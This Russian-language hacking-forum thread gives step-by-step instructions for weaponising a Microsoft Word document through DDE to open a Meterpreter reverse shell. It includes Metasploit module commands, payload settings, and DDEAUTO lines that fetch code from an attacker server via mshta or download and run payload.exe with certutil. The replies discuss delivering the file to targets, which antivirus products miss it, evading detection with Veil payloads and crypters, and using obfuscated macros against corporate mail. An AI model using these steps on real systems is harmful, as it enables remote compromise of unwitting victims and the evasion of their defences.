• Открыта запись на вторую часть курса по анонимности и безопасности в сети интернет "Paranoid II" от команды codeby. Анонимные роутеры, Подъём, настройка и администрирование Tor-ноды, Работа с железом ПК, Удаление аппаратных закладок, Минимизация рисков, Авторские разработки и многое другое. Подробнее ...

Статья Meterpreter сессия через Microsoft Word

A

adm2

Happy New Year
05.07.2017
50
117
Добрый день.
В двух словах покажу как получить сессию meterpreter используя встроенную функцию Microsoft Office DDE
Почерпнуть немного информации о том что это можно тут:


Информация предоставлена для ознакомления, используйте на свой страх и риск.

Нам понадобится Kali linux и какая-нибудь винда (любая от XP до windows 10) с установленным на нём пакетом microsoft office.

Приступим:
Качаем пакет и копируем его в каталог metasploit
Код:
wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb
cp dde_delivery.rb /usr/share/metasploit-framework/modules/exploits/windows/
Запускаем metasploit и на всякий обновляем модули
msf > reload_all
msf > use exploit/windows/dde_delivery
Подгружаем полезную нагрузку
msf exploit(dde_delivery) > set payload windows/meterpreter/reverse_tcp
msf exploit(dde_delivery) > set lhost 192.168.6.30 (тут ваш IP)
msf exploit(dde_delivery) > exploit

Вывод будет следующим:
Meterpreter сессия через Microsoft Word

И нам нужны последние строки, которые мы и вставляем в ворд
У меня это
Код:
DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\windows\\system32\\mshta.exe "http://192.168.6.30:8080/dOwU9wGE10np3"
Вот гифка куда и как нужно ето воткнуть

Дальнейшие действия понятны: доставляем этот файл на атакуемый компьютер и запускаем
При открытии будут выскакивать различного рода предупреждения, но ничего связанного с безопасностью там не сказано, но некоторые антивирусы уже будут ругаться на файл.
Meterpreter сессия через Microsoft Word


Meterpreter сессия через Microsoft Word


Meterpreter сессия через Microsoft Word


После открытия файла прилетит заветная сессия meterpreter
Meterpreter сессия через Microsoft Word


Многие антивирусы уже реагируют на файл. Проверка на nodistribute.com


Meterpreter сессия через Microsoft Word

Спасибо за внимание)
P.S. Первый раз пишу статью на форум, посему наверное немного сумбурная подача)

[doublepost=1510562006,1510226184][/doublepost]Альтернативный код для загрузки файлов, можно использовать не только meterpreter, но и любой продукт для пост-эксплуатации. Empire например

Код:
DDEAUTO c:\\Windows\\system32\\cmd.exe "/k certutil -urlcache -split -f http://192.168.0.50/payload.exe && payload"
 

Вложения

Последнее редактирование:
I

iamxcite

New member
03.11.2017
2
0
Спасибо, интересно!
 
OneDollar

OneDollar

Well-known member
07.09.2017
283
344
Аваст и есет от жизни отстали..) Нихрена не видят :) Касперыч глазастый
 
  • Нравится
Реакции: Vertigo, nerfy и Kalina
A

adm2

Happy New Year
05.07.2017
50
117
Аваст и есет от жизни отстали..) Нихрена не видят :) Касперыч глазастый
Любопытно что шестой есет потом всё таки нашёл подозрительную активность в файле, а вот пятый до сих пор слепой котёнок

Если использовать нагрузку, созданную через Veil (про собственные крипторы вообще молчу) и подгрузить её таким образом:
> DDEAUTO c:\\Windows\\system32\\cmd.exe "/k certutil -urlcache -split -f && payload"
То здесь даже шестой нод ничего не видит.
 
  • Нравится
Реакции: Kalina
OneDollar

OneDollar

Well-known member
07.09.2017
283
344
Любопытно что шестой есет потом всё таки нашёл подозрительную активность в файле, а вот пятый до сих пор слепой котёнок

Если использовать нагрузку, созданную через Veil (про собственные крипторы вообще молчу) и подгрузить её таким образом:
> DDEAUTO c:\\Windows\\system32\\cmd.exe "/k certutil -urlcache -split -f && payload"
То здесь даже шестой нод ничего не видит.
А что на счет "собственные крипторы" может поделишься ?)
 
A

adm2

Happy New Year
05.07.2017
50
117
А что на счет "собственные крипторы" может поделишься ?)
У меня их пока нет, на этой тропе я всего полгода, после того как чуть не поразил WannaCry (спасло то что ПК не смотрели напрямую в инет)
Посему пришлось окунуться в область информационной безопасности поглубже дабы знать где, как, через что, откуда и каким образом может проникнуть какой-нибудь зловред)
 
H

Hackaton192

Есть методы хорошей обфускации DDE-шек, тут на форуме была про них статья! с помощью функции QUOTE, гугл всем в помощь!
 
  • Нравится
Реакции: Underwood
J

JoeBlack0001

Тут можно смело втыкать рекламу криптора =))
 
U

Underwood

Есть методы хорошей обфускации DDE-шек, тут на форуме была про них статья! с помощью функции QUOTE, гугл всем в помощь
Статью можно почитать по ссылке. Кстати, в версиях MSWord не позднее 2007, можно также использовать frames и framesets, которые используются для загрузки произвольного html кода с любой веб-страницы в поле frame документа.
 
  • Нравится
Реакции: Vertigo и The Codeby
OneDollar

OneDollar

Well-known member
07.09.2017
283
344
Статью можно почитать по ссылке. Кстати, в версиях MSWord не позднее 2007, можно также использовать frames и framesets, которые используются для загрузки произвольного html кода с любой веб-страницы в поле frame документа.
Вчера через юникорн создал файл, чекается 10тью антивирусами. Из топовых только касперский. Позор есет и авасту) Может я как-то натупил, но вряд ли. Смотрите:
 
  • Нравится
Реакции: Vertigo и Underwood
H

Hackaton192

Вчера через юникорн создал файл, чекается 10тью антивирусами. Из топовых только касперский. Позор есет и авасту) Может я как-то натупил, но вряд ли. Смотрите:
Думаю все кто в теме давно уже юзают данный инструмент, всем пожалуйста:


На мой взгляд тема с DDE, уступает тем же макросам, так как ПЕРВОЕ уж очень много раз приходится нажать на OK. А ВТОРОЕ с точки соц.инженерии жертва не видит документа и ее сложно заинтересовать(только лишь названием документа получается и то,что в теле письма,если мы рассылаем через e-mail), поэтому я юзаю хорошо обфусцированные макросы(пусть они на известные почтовые сервисы доходят хуже, но на корпоративные почтовики залетают как-надо)
 
shooter

shooter

Well-known member
25.10.2016
185
145
За статью спасибо! но было бы интереснее узнать что нибудь про CVE-2017-11882
 
A

adm2

Happy New Year
05.07.2017
50
117
Здорово, надо было на конкурс !
Какой конкурс =) самое обычное описание стандартного, в скором времени, описания эксплоита)
Вот когда найдёт просвещение, тогда да)
За статью спасибо! но было бы интереснее узнать что нибудь про CVE-2017-11882
С момента комментария вышло две статьи на данную CVE
CVE-2017-11882 или Взлом с помощью безобидного документа
CVE-2017-11882 MS Word Metasploit
 
  • Нравится
Реакции: The Codeby
Мы в соцсетях:  ТелеграмВконтактеДзенФейсбукТвиттерЮтуб